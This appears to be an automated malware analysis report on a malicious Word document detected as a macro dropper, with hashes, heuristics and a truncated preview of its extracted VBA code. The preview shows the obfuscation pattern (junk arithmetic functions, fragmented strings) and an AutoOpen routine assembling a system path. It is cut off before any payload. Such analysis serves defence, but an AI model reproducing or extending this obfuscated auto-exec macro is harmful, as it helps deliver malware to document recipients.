Office (OLE) malware analysis — malicious · 16f5c2aa5b6014e0

MALICIOUS

Office (OLE)

476.0 KB Created: 2018-10-09 10:08:00 Authoring application: Microsoft Office Word First seen: 2018-12-09

MD5: 6f7dcf0dc05bff4ca4b781010c64f00f SHA-1: 2f11db85d61d1ae05026e78e572338f964c37083 SHA-256: 16f5c2aa5b6014e0861aae59e051a817511ae273b58e184c3b9be7ec6d2676ae

230 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as a malicious dropper by ClamAV. High-severity heuristics indicate the presence of an AutoOpen VBA macro that utilizes CreateObject, a common technique for downloading and executing secondary payloads. The obfuscated VBA code does not reveal specific download URLs or execution commands, but the overall behavior points to a dropper functionality.

Heuristics 8

ClamAV: Doc.Dropper.Agent-7079664-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-7079664-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 230293 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	230293 bytes
SHA-256: `dd92b0fe259aee500a469ae188979875d1ac8c801094f996364afd40fdd2eee6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Function plostvy() ytqaozbnca0 = -108 * 161 eutwriye90 = -151 + 180 End Function Function yeouq() ycxmbxflrcy = -170 * 9 End Function Function wcmht5(uyxs) ygsciu = -130 - 143 End Function Function aielny(sqdgebhm, cdazsg) dzlacfmxlxkc = -136 + 36 dkacdraee = -100 / 112 yafiavid = -126 * 85 eyeavco = -162 / 160 End Function Function krsdua() Dim afhbtzxfuvcf As Integer afhbtzxfuvcf = -63 * 166 oioa = -148 / 11 End Function Function ofglggj() ilvgkelm03 = -169 / 127 End Function Function imzxhjqi41(ccnhkiy) ouebx80 = -83 * 65 apzqs = -135 / 15 hsnwyel = -54 + 1 End Function Function yihl(eaeeu, jkziejy) jfipfmp55 = -134 + 29 End Function Function qeayfr() nmdzak = -155 / 158 lxeyu = -114 * 83 cwsompwtvyq = -35 - 19 End Function Function fwfnfdek() Dim zriyimzp As Integer zriyimzp = -4 + 5 vlohjfe = -82 * 15 End Function Function sqaikfj(njdiix91) okaymaa = -115 / 27 End Function Function unyynt(yoxcfx6) iivcoekpue = -75 - 29 yeruyzo = -179 - 44 End Function Function hknizjuu6() qrsnvmzoqcea = -121 / 125 yavugjeu4 = -170 - 126 End Function Function nwumxw7(irih) euoj3 = -6 / 13 sfiaidxi = -141 / 88 ywvuaaoi = -33 * 146 End Function Function usjhpxcqb(oocgyoxx) Dim xfqcebug As Integer xfqcebug = -148 - 131 weuze = -111 / 42 End Function Function uojrby() wmolzfhusg = -111 * 17 uaym = -27 + 17 End Function Function upcobu(ayfu, zoriqrt) ayye8 = -79 + 9 End Function Function naoiojc8(rgzhdqxi, ybaap22) naleutt = -116 + 56 edzzdaiqni2 = -173 - 151 trpzqs = -94 + 19 flxeuasq = -20 - 51 End Function Function jqlmdqqwo(ivmdlrpi) uquqreuqn = -137 * 8 mweyecshmsj = -18 + 106 edgfsoa = -80 + 10 dakicwwl = -174 - 174 End Function Function ijfmlxfgq(bkaiwdv, tfyieza) hmwyucsjot = -178 * 174 End Function Sub AutoOpen() mmsiyu = "+$ioolydgfhhcoeba" ogiabkei = -12 - 138 ipdaikliqz = -26 / 164 jqyblmufs = -39 - 122 rgstbe = "qk98+$l" uyyyxjiy = -136 / 114 akvwjouwn = -159 / 27 pgayyay = "bjhoy" obueibx = -70 - 149 hqyipqietr = -163 / 95 xmdkbsid = Environ("SystemRoot") uyusger = -93 + 140 hcikay = -88 + 66 khawtgqxtqa = -13 * 122 caqgom = xmdkbsid nkptknlww = -38 / 97 evqeay3 = -93 * 62 plivteyo60 = -118 * 166 caqgom = caqgom + "\syst" cjuqxgyxqu2 = -65 - 106 iulne = -45 * 180 eoer = -144 / 98 efow82 = -61 * 24 vuaxv0 = "iyeski" ripllm = -62 * 62 uphou = -93 + 19 kdosmuswl52 = "iyay95+$udntvys" Dim zgaleyfce As String zgaleyfce = -34 / 163 yvef = -173 * 87 oeea = -46 * 94 eieeo = "dpintoeoye27" alwwarkybpk = -82 * 125 maeuyknrznh = -167 / 174 grckjxxesc09 = -80 / 147 yuafj = "+$ukhkizuyufvvm" Dim uyiqkfsb6 As Integer uyiqkfsb6 = -115 / 147 amdmiekjkxf = -47 + 25 Dim rtveuiyqtu9 As Integer rtveuiyqtu9 = -100 + 160 uteoieysg = -45 - 78 ymcuoot = "htoete+" hcuooijc = -170 * 145 qslxsbp = -104 / 70 qaiyujyr84 = -154 / 31 jblxsjmnpje = -156 * 60 yakceuwt = "$nn" Dim euyytw7 As Integer euyytw7 = -61 * 3 suqvs = "em32" fsebcpqbrr97 = -110 + 176 pgjriayarq = -88 / 64 caqgom = caqgom + suqvs Dim iijqkjvxkshf As String iijqkjvxkshf = -64 - 74 ickia = -87 + 89 cqfxkkjz = caqgom ckutds = -122 + 151 bwezjqb = -125 - 179 oaiia = -21 - 73 uukxorme = "\Wi" vzboint15 = -2 / 44 royiyobj = -78 * 15 uasxnui = -179 / 143 byawxzsthn = -2 * 57 cqfxkkjz = cqfxkkjz + uukxorme bepvroo = -58 * 17 fuou = -21 - 167 ynmfjwi96 = -124 * 107 ejsueqo = -81 * 174 yhnhpio = -161 * 1 niur6 = -18 / 173 jvdpwmoinng = cqfxkkjz nenfyyrpey = -151 - 2 jvdpwmoinng = jvdpwmoinng + "nd" htqi = -38 / 28 vuowvffiwk = -4 - 92 eouyslpzo0 = -144 / 88 oiauiaujv = -31 * 148 evyjsttz = -26 - 64 oubgf = -85 * 154 yity00 = -141 / 60 ygfry6 = -2 / 47 oawvymbasq = -27 - 110 yaouon = mmsiyu & rgstbe & pgayyay & vuax ... (truncated)

SHA-256: dd92b0fe259aee500a469ae188979875d1ac8c801094f996364afd40fdd2eee6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function plostvy()
ytqaozbnca0 = -108 * 161
eutwriye90 = -151 + 180
End Function
Function yeouq()
ycxmbxflrcy = -170 * 9
End Function
Function wcmht5(uyxs)
ygsciu = -130 - 143
End Function
Function aielny(sqdgebhm, cdazsg)
dzlacfmxlxkc = -136 + 36
dkacdraee = -100 / 112
yafiavid = -126 * 85
eyeavco = -162 / 160
End Function
Function krsdua()
Dim afhbtzxfuvcf As Integer
afhbtzxfuvcf = -63 * 166
oioa = -148 / 11
End Function
Function ofglggj()
ilvgkelm03 = -169 / 127
End Function
Function imzxhjqi41(ccnhkiy)
ouebx80 = -83 * 65
apzqs = -135 / 15
hsnwyel = -54 + 1
End Function
Function yihl(eaeeu, jkziejy)
jfipfmp55 = -134 + 29
End Function
Function qeayfr()
nmdzak = -155 / 158
lxeyu = -114 * 83
cwsompwtvyq = -35 - 19
End Function
Function fwfnfdek()
Dim zriyimzp As Integer
zriyimzp = -4 + 5
vlohjfe = -82 * 15
End Function
Function sqaikfj(njdiix91)
okaymaa = -115 / 27
End Function
Function unyynt(yoxcfx6)
iivcoekpue = -75 - 29
yeruyzo = -179 - 44
End Function
Function hknizjuu6()
qrsnvmzoqcea = -121 / 125
yavugjeu4 = -170 - 126
End Function
Function nwumxw7(irih)
euoj3 = -6 / 13
sfiaidxi = -141 / 88
ywvuaaoi = -33 * 146
End Function
Function usjhpxcqb(oocgyoxx)
Dim xfqcebug As Integer
xfqcebug = -148 - 131
weuze = -111 / 42
End Function
Function uojrby()
wmolzfhusg = -111 * 17
uaym = -27 + 17
End Function
Function upcobu(ayfu, zoriqrt)
ayye8 = -79 + 9
End Function
Function naoiojc8(rgzhdqxi, ybaap22)
naleutt = -116 + 56
edzzdaiqni2 = -173 - 151
trpzqs = -94 + 19
flxeuasq = -20 - 51
End Function
Function jqlmdqqwo(ivmdlrpi)
uquqreuqn = -137 * 8
mweyecshmsj = -18 + 106
edgfsoa = -80 + 10
dakicwwl = -174 - 174
End Function
Function ijfmlxfgq(bkaiwdv, tfyieza)
hmwyucsjot = -178 * 174
End Function
Sub AutoOpen()
mmsiyu = "+$ioolydgfhhcoeba"
ogiabkei = -12 - 138
ipdaikliqz = -26 / 164
jqyblmufs = -39 - 122
rgstbe = "qk98+$l"
uyyyxjiy = -136 / 114
akvwjouwn = -159 / 27
pgayyay = "bjhoy"
obueibx = -70 - 149
hqyipqietr = -163 / 95
xmdkbsid = Environ("SystemRoot")
uyusger = -93 + 140
hcikay = -88 + 66
khawtgqxtqa = -13 * 122
caqgom = xmdkbsid
nkptknlww = -38 / 97
evqeay3 = -93 * 62
plivteyo60 = -118 * 166
caqgom = caqgom + "\syst"
cjuqxgyxqu2 = -65 - 106
iulne = -45 * 180
eoer = -144 / 98
efow82 = -61 * 24
vuaxv0 = "iyeski"
ripllm = -62 * 62
uphou = -93 + 19
kdosmuswl52 = "iyay95+$udntvys"
Dim zgaleyfce As String
zgaleyfce = -34 / 163
yvef = -173 * 87
oeea = -46 * 94
eieeo = "dpintoeoye27"
alwwarkybpk = -82 * 125
maeuyknrznh = -167 / 174
grckjxxesc09 = -80 / 147
yuafj = "+$ukhkizuyufvvm"
Dim uyiqkfsb6 As Integer
uyiqkfsb6 = -115 / 147
amdmiekjkxf = -47 + 25
Dim rtveuiyqtu9 As Integer
rtveuiyqtu9 = -100 + 160
uteoieysg = -45 - 78
ymcuoot = "htoete+"
hcuooijc = -170 * 145
qslxsbp = -104 / 70
qaiyujyr84 = -154 / 31
jblxsjmnpje = -156 * 60
yakceuwt = "$nn"
Dim euyytw7 As Integer
euyytw7 = -61 * 3
suqvs = "em32"
fsebcpqbrr97 = -110 + 176
pgjriayarq = -88 / 64
caqgom = caqgom + suqvs
Dim iijqkjvxkshf As String
iijqkjvxkshf = -64 - 74
ickia = -87 + 89
cqfxkkjz = caqgom
ckutds = -122 + 151
bwezjqb = -125 - 179
oaiia = -21 - 73
uukxorme = "\Wi"
vzboint15 = -2 / 44
royiyobj = -78 * 15
uasxnui = -179 / 143
byawxzsthn = -2 * 57
cqfxkkjz = cqfxkkjz + uukxorme
bepvroo = -58 * 17
fuou = -21 - 167
ynmfjwi96 = -124 * 107
ejsueqo = -81 * 174
yhnhpio = -161 * 1
niur6 = -18 / 173
jvdpwmoinng = cqfxkkjz
nenfyyrpey = -151 - 2
jvdpwmoinng = jvdpwmoinng + "nd"
htqi = -38 / 28
vuowvffiwk = -4 - 92
eouyslpzo0 = -144 / 88
oiauiaujv = -31 * 148
evyjsttz = -26 - 64
oubgf = -85 * 154
yity00 = -141 / 60
ygfry6 = -2 / 47
oawvymbasq = -27 - 110
yaouon = mmsiyu & rgstbe & pgayyay & vuax
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.